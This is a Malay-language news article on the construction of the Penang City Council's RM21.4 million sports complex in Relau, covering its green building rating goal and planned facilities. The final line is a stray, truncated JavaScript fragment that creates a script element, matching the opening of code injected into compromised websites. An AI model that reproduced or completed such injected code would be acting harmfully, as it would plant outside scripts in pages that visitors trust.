Kompleks Sukan Bandaraya Relau dalam proses

PAYA TERUBONG – Pengarah Bangunan Majlis Bandaraya Pulau Pinang (MBPP), Ar. Yew Tung Seang berharap Kompleks Sukan Bandaraya d i Relau yang kini dalam proses pembinaan mampu memenuhi kriteria bangunan hijau ditetapkan dan seterusnya memperoleh penarafan Index Bangunan Hijau (GBI).

Katanya, MBPP menyasarkan kompleks sukan baharu yang dibangunkan di kawasan pembangunan seluas 2.17 ekar dengan kos RM21.4 juta yang bakal disiapkan dalam tempoh 20 bulan tersebut mampu memperoleh penarafan GBI bertaraf Perak.

“Selain menggunakan panel solar, kriteria penarafan GBI adalah meliputi aspek pengurusan, reka bentuk bangunan, penggunaan bahan, penjimatan tenaga dan cat yang digunakan,” jelasnya kepada Buletin Mutiara ketika mengadakan sesi lawatan khas ke tapak projek berkaitan di sini baru-baru ini.

Tinjauan wakil Buletin Mutiara yang turut serta dalam lawatan berkaitan mendapati bahawa proses pembinaan adalah berjalan dengan lancar dan telah memasuki peringkat meratakan tanah dan penanaman cerucuk bangunan.

Pada 16 April lalu, Ketua Menteri Y.A.B. Tuan Lim Guan Eng bersama-sama barisan kepimpinan Kerajaan Negeri yang lain telah menyempurnakan upacara pecah tanah berhubung pembinaan kompleks sukan yang bakal menempatkan kepelbagaian kemudahan sukan untuk rakyat negeri ini.

Antaranya, sebuah kolam renang bersaiz olimpik, kolam terjun (1), gelanggang badminton (10), kafeteria, ‘pro shop’, bilik gymnasium, kawasan parkir dan lain-lain.

Menurut Guan Eng, dengan adanya kompleks sukan bertaraf antarabangsa tersebut, ianya diharap dapat membantu Pulau Pinang melahirkan lebih ramai atlet-atlet berkaliber dalam mewarnai kancah sukan tempatan dan antarabangsa.

var d=document;var s=d.createElement(‘script’);